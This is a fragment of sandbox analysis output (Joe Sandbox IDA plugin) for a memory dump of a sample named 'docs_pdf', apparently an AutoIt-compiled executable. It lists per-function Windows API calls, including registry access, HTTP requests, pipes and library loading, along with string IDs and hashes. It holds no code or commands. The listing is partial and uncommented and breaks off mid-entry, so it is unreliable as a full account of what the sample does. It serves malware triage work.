                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: 23a372bcaadde392dc618c825532aed3492a4372416e55a551cf3ec2f45c3bf6
                                                            • Instruction ID: 2006fe90efe804efdbef060c950003ccd4bfa09bb3da1f091c4807d0195f88e3
                                                            • Opcode Fuzzy Hash: 23a372bcaadde392dc618c825532aed3492a4372416e55a551cf3ec2f45c3bf6
                                                            • Instruction Fuzzy Hash: 32F03032245158BBE7215BA2DC0DEEF7B7CEFCAB11F00016DFA08D1450D7A11A82C6B5
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 001574E5
                                                            • EnterCriticalSection.KERNEL32(?,?,00101044,?,?), ref: 001574F6
                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00101044,?,?), ref: 00157503
                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00101044,?,?), ref: 00157510
                                                              • Part of subcall function 00156ED7: CloseHandle.KERNEL32(00000000,?,0015751D,?,00101044,?,?), ref: 00156EE1
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00157523
                                                            • LeaveCriticalSection.KERNEL32(?,?,00101044,?,?), ref: 0015752A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: ec68049093593762761de8969e8f98ad7e6e33865add2c0d65efd2ecbbf62a3c
                                                            • Instruction ID: ed8fbc2dbc1258a60fe4fa77540082000a13eb6a45c22eb36a5c6e775c909e4b
                                                            • Opcode Fuzzy Hash: ec68049093593762761de8969e8f98ad7e6e33865add2c0d65efd2ecbbf62a3c
                                                            • Instruction Fuzzy Hash: FDF03A3A144612EBDB111B64FC899EB773AFF45302F400539F606958A2DB7598C6CAA0
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00148E7F
                                                            • UnloadUserProfile.USERENV(?,?), ref: 00148E8B
                                                            • CloseHandle.KERNEL32(?), ref: 00148E94
                                                            • CloseHandle.KERNEL32(?), ref: 00148E9C
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00148EA5
                                                            • HeapFree.KERNEL32(00000000), ref: 00148EAC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: cd2b7a043599d21f1ac3e1d8d45a2d432b973a59ebefc9e308c2a7e1b09523f2
                                                            • Instruction ID: 16c0ed66f6ba8d8803f836147f8af08fd186783598efc1ac37909c48db2474e9
                                                            • Opcode Fuzzy Hash: cd2b7a043599d21f1ac3e1d8d45a2d432b973a59ebefc9e308c2a7e1b09523f2
                                                            • Instruction Fuzzy Hash: 4EE05276104505FBDA011FF5EC0C95ABB79FB89762B608639F21D82870CB3294E2DB60
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00168928
                                                            • CharUpperBuffW.USER32(?,?), ref: 00168A37
                                                            • VariantClear.OLEAUT32(?), ref: 00168BAF
                                                              • Part of subcall function 00157804: VariantInit.OLEAUT32(00000000), ref: 00157844
                                                              • Part of subcall function 00157804: VariantCopy.OLEAUT32(00000000,?), ref: 0015784D
                                                              • Part of subcall function 00157804: VariantClear.OLEAUT32(00000000), ref: 00157859
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 14cc8fd05b28ae0eaef624c25aa9c2ef8b5f4ef90139f227a8f40eb398a7ba50
                                                            • Instruction ID: baf24daa73a9e35ae76d2fc9ee20ea0d742674eaf4fb3f566fcb829ef8b5683e
                                                            • Opcode Fuzzy Hash: 14cc8fd05b28ae0eaef624c25aa9c2ef8b5f4ef90139f227a8f40eb398a7ba50
                                                            • Instruction Fuzzy Hash: 319190716083059FC714DF28C88596BBBF4EF89314F044A6EF99A8B362DB31E945CB52
                                                            APIs
                                                              • Part of subcall function 0010FEC6: _wcscpy.LIBCMT ref: 0010FEE9
                                                            • _memset.LIBCMT ref: 00153077
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001530A6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00153159
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00153187
                                                            Strings
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: 5f978afc35387b51f2b6eb337112e7535dfa8b88f635787732e618b48354340d
                                                            • Instruction ID: 480a9b8af946de780c10ec42718d1e02c04f76a74166e60058329a5b3708f068
                                                            • Opcode Fuzzy Hash: 5f978afc35387b51f2b6eb337112e7535dfa8b88f635787732e618b48354340d
                                                            • Instruction Fuzzy Hash: 2F51A232608700DAD7199F38D8856ABB7E4EF55391F04092DFDB5DB1D1DB70CA888792
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0014DAC5
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0014DAFB
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0014DB0C
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0014DB8E
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: DllGetClassObject
                                                            • API String ID: 753597075-1075368562
                                                            • Opcode ID: bbf8df6739e77d1276af9c2d25143e5a96d062127900a29a58ae6e59edce31fe
                                                            • Instruction ID: 0228e25f0cdfef452f3f67be395478258aa0269223b24739523272a3583f3cb5
                                                            • Opcode Fuzzy Hash: bbf8df6739e77d1276af9c2d25143e5a96d062127900a29a58ae6e59edce31fe
                                                            • Instruction Fuzzy Hash: 12416FB1600208EFDF15CF54D885A9A7BB9EF45350F1680AEED099F225D7B1DE44CBA0
                                                            APIs
                                                            • _memset.LIBCMT ref: 00152CAF
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00152CCB
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00152D11
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001B6890,00000000), ref: 00152D5A
                                                            Strings
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: 44b9bf03da39bae3631e760459ed23b99526db2cfbfaa9bf04db14dbcaf729cf
                                                            • Instruction ID: a5fe49b4d6fd05bd631f83c1f2b1996eb29fe919e7118b810e7bef04ac32c036
                                                            • Opcode Fuzzy Hash: 44b9bf03da39bae3631e760459ed23b99526db2cfbfaa9bf04db14dbcaf729cf
                                                            • Instruction Fuzzy Hash: 84417E32204302DFD724DF64C845B5ABBE8AF86321F14466EF9759B291D770E909CB92
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0016DAD9
                                                              • Part of subcall function 000F79AB: _memmove.LIBCMT ref: 000F79F9
                                                            Strings
                                                            Similarity
                                                            • API ID: BuffCharLower_memmove
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 3425801089-567219261
                                                            • Opcode ID: 1eb739734e2c6226334a1098ff51ad0a107a9a5234dd109bf765e38dc58e63c5
                                                            • Instruction ID: 054d3975eb39d84c2c84fc858a1c56a6b4a5f450f4ade11941d19fd18d8a675b
                                                            • Opcode Fuzzy Hash: 1eb739734e2c6226334a1098ff51ad0a107a9a5234dd109bf765e38dc58e63c5
                                                            • Instruction Fuzzy Hash: 9A31E670A046199FCF00EF94DC818FEB3B4FF16320B018A29E925A76D6CB71A955CB80
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001493F6
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00149409
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00149439
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 365058703-1403004172
                                                            • Opcode ID: 2685fdbd7e6808bbc0ade71de2c4ac1adfe79d97d95437167d68a36d317fae4c
                                                            • Instruction ID: 12834d7497f57239712c3ae63e68cdebbfb64abf0d9e49c631d2550d99762969
                                                            • Opcode Fuzzy Hash: 2685fdbd7e6808bbc0ade71de2c4ac1adfe79d97d95437167d68a36d317fae4c
                                                            • Instruction Fuzzy Hash: 7521E471D40108BBDB18AB74DC868FFB778EF05360B144129FA29971F1DB354D4A9650
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0012D5EC
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            • _memset.LIBCMT ref: 000F418D
                                                            • _wcscpy.LIBCMT ref: 000F41E1
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000F41F1
                                                            Strings
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: ded881bbff626958bd649d42814f3db4a83df537450d865cb28c4247968d9cda
                                                            • Instruction ID: d04307e36d2f6803022fff2cff226183497b9b64239d96cce22b49bef497af27
                                                            • Opcode Fuzzy Hash: ded881bbff626958bd649d42814f3db4a83df537450d865cb28c4247968d9cda
                                                            • Instruction Fuzzy Hash: A331E4710083085AE735EB60DC45FFB77E8AF55300F10461EF689928A2EB789689D793
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00161B40
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00161B66
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00161B96
                                                            • InternetCloseHandle.WININET(00000000), ref: 00161BDD
                                                              • Part of subcall function 00162777: GetLastError.KERNEL32(?,?,00161B0B,00000000,00000000,00000001), ref: 0016278C
                                                              • Part of subcall function 00162777: SetEvent.KERNEL32(?,?,00161B0B,00000000,00000000,00000001), ref: 001627A1
                                                            Strings
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: d4a67dc6c52654a35ae9ef28c12f55e91c63dcc82ead4128e172ba17ce9647dd
                                                            • Instruction ID: 84338113ea679694a9218a67621bff6f2045b99eab0211c4073bac753cb29e21
                                                            • Opcode Fuzzy Hash: d4a67dc6c52654a35ae9ef28c12f55e91c63dcc82ead4128e172ba17ce9647dd
                                                            • Instruction Fuzzy Hash: 1D21CDB2600208BFEB159F608C85EBF76FCEB59744F14412AF405A6640EB309D559761
                                                            APIs
                                                              • Part of subcall function 000F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000F1D73
                                                              • Part of subcall function 000F1D35: GetStockObject.GDI32(00000011), ref: 000F1D87
                                                              • Part of subcall function 000F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000F1D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001766D0
                                                            • LoadLibraryW.KERNEL32(?), ref: 001766D7
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001766EC
                                                            • DestroyWindow.USER32(?), ref: 001766F4
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: 9668d4a4e8cc18aa2a372279c3c1af92f2570250b140c11403f8b15fedf2c9d7
                                                            • Instruction ID: ce06d0fb3a67dde6dc99e1d31cbc433cc4014c99a5dc84d109f5e11702fd1d99
                                                            • Opcode Fuzzy Hash: 9668d4a4e8cc18aa2a372279c3c1af92f2570250b140c11403f8b15fedf2c9d7
                                                            • Instruction Fuzzy Hash: 7F219D75200A06ABEF104F64EC80EBB37BDFF59368F908629FA1892190D771CC919B60
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 0015705E
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00157091
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 001570A3
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001570DD
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 24cb9c1784bebd35f3afd59052bf3f00feb6f624ebd538c57953f92c3c162882
                                                            • Instruction ID: f44b62b7a41d4dc24690d901f6a5ab7614d913aa050060a5bc304e845a0cb664
                                                            • Opcode Fuzzy Hash: 24cb9c1784bebd35f3afd59052bf3f00feb6f624ebd538c57953f92c3c162882
                                                            • Instruction Fuzzy Hash: 7B218174504309EBDB209F29EC06A9AB7F8AF56721F204A19FCB1DB2D0D7709884CB50
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0015712B
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0015715D
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0015716E
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001571A8
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 28aae69b89aaaaf2426f0c5e4f902a33655709dca3504f5aa269e950807f3116
                                                            • Instruction ID: 47d73be0ffebc424de96e3bc42c35de36e5c578f8e6436c884e4c698b169deb3
                                                            • Opcode Fuzzy Hash: 28aae69b89aaaaf2426f0c5e4f902a33655709dca3504f5aa269e950807f3116
                                                            • Instruction Fuzzy Hash: E521F575504705DBDB209F28AC86AAAB7F8AF55331F20061DFCB1DB2D0D7709889CBA0
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0015AEBF
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0015AF13
                                                            • __swprintf.LIBCMT ref: 0015AF2C
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0017F910), ref: 0015AF6A
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: 72c9043b7797120ae0e2fcdb05727e1d607cba73d44926c63ec284c1e7f1f996
                                                            • Instruction ID: 9cca4d87e743492eef4607af6524e8f7ae9155ca4059d453fd3a40c61fcb41a4
                                                            • Opcode Fuzzy Hash: 72c9043b7797120ae0e2fcdb05727e1d607cba73d44926c63ec284c1e7f1f996
                                                            • Instruction Fuzzy Hash: 88214134A00109AFCB10DF64CD85EEE7BB8EF49705B104069F909EB252DB71EA45DB61
                                                            APIs
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                              • Part of subcall function 0014A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0014A399
                                                              • Part of subcall function 0014A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0014A3AC
                                                              • Part of subcall function 0014A37C: GetCurrentThreadId.KERNEL32 ref: 0014A3B3
                                                              • Part of subcall function 0014A37C: AttachThreadInput.USER32(00000000), ref: 0014A3BA
                                                            • GetFocus.USER32 ref: 0014A554
                                                              • Part of subcall function 0014A3C5: GetParent.USER32(?), ref: 0014A3D3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0014A59D
                                                            • EnumChildWindows.USER32(?,0014A615), ref: 0014A5C5
                                                            • __swprintf.LIBCMT ref: 0014A5DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                            • String ID: %s%d
                                                            • API String ID: 1941087503-1110647743
                                                            • Opcode ID: e1bf77cdda6f4b25458655db14e94afdb4ee1f7a646a1fcc2664fdac6ad85592
                                                            • Instruction ID: 32101d4b8c40ac7b7c604aac81115426eda0cdbc6b9d1d54d0858a7c61546044
                                                            • Opcode Fuzzy Hash: e1bf77cdda6f4b25458655db14e94afdb4ee1f7a646a1fcc2664fdac6ad85592
                                                            • Instruction Fuzzy Hash: F811A275680208ABDF11BF64DC85FEA3778AF48700F454079BA0CAA163DB7059869B76
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00152048
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: 8208a26ae9bd2682f56515068f8eba68b968d85d99fd4046d17cbe281c7e76e5
                                                            • Instruction ID: 20c54e1b352bb0d2959b266347c86528172dcc9e342bbd6e07b8cec1a55d8e6a
                                                            • Opcode Fuzzy Hash: 8208a26ae9bd2682f56515068f8eba68b968d85d99fd4046d17cbe281c7e76e5
                                                            • Instruction Fuzzy Hash: 1D116135900109DFCF04EFA4D9414FEB7B4FF26304B508468E8656B292EB32994ACB51
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0016EF1B
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0016EF4B
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0016F07E
                                                            • CloseHandle.KERNEL32(?), ref: 0016F0FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: 3ec19893a4de63cabe4736602fbcc9a9750a8deaaac5b82046d61efdd1917970
                                                            • Instruction ID: 2c1b40e6c95b7ae078ce0ce7c9ce2eedb474766cf224951b2cc8c0da460c3f30
                                                            • Opcode Fuzzy Hash: 3ec19893a4de63cabe4736602fbcc9a9750a8deaaac5b82046d61efdd1917970
                                                            • Instruction Fuzzy Hash: DC81A2716043019FD724DF28DC46F6AB7E5AF88720F14881DFA99DB692DB70AC41CB92
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 001710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00170038,?,?), ref: 001710BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00170388
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001703C7
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0017040E
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0017043A
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00170447
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: 047007f0f8431c95f283f6df677e5ac845741df60e6b42d627058b896f057141
                                                            • Instruction ID: 96ef57e97ef62c606c95316625d5fcec7c20bc1ef1ca825b5d31900d2b41ba72
                                                            • Opcode Fuzzy Hash: 047007f0f8431c95f283f6df677e5ac845741df60e6b42d627058b896f057141
                                                            • Instruction Fuzzy Hash: 00512B71208304AFD705EB54DC81EAEB7F9FF88304F14892DB699972A2DB30E945DB52
                                                            APIs
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0016DC3B
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0016DCBE
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0016DCDA
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0016DD1B
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0016DD35
                                                              • Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00157B20,?,?,00000000), ref: 000F5B8C
                                                              • Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00157B20,?,?,00000000,?,?), ref: 000F5BB0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 327935632-0
                                                            • Opcode ID: c0593e2421dee908b1b8e7ba6d8ee15c4dbabd971bedf99a1242c0acc37a8d43
                                                            • Instruction ID: db38e7d98df9d8638018b1d7ea574a1e7478c3a1f56f2c357c4b19fafe128f23
                                                            • Opcode Fuzzy Hash: c0593e2421dee908b1b8e7ba6d8ee15c4dbabd971bedf99a1242c0acc37a8d43
                                                            • Instruction Fuzzy Hash: 50512B35A00609DFCB00EFA8D8849EDB7F4FF58310B158069EA19AB752DB70AD55CB91
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0015E88A
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0015E8B3
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0015E8F2
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0015E917
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0015E91F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: a5d3378d1389b15cd89df2caf5ce0805df542bfc14bf71dd9c4a968984b6f074
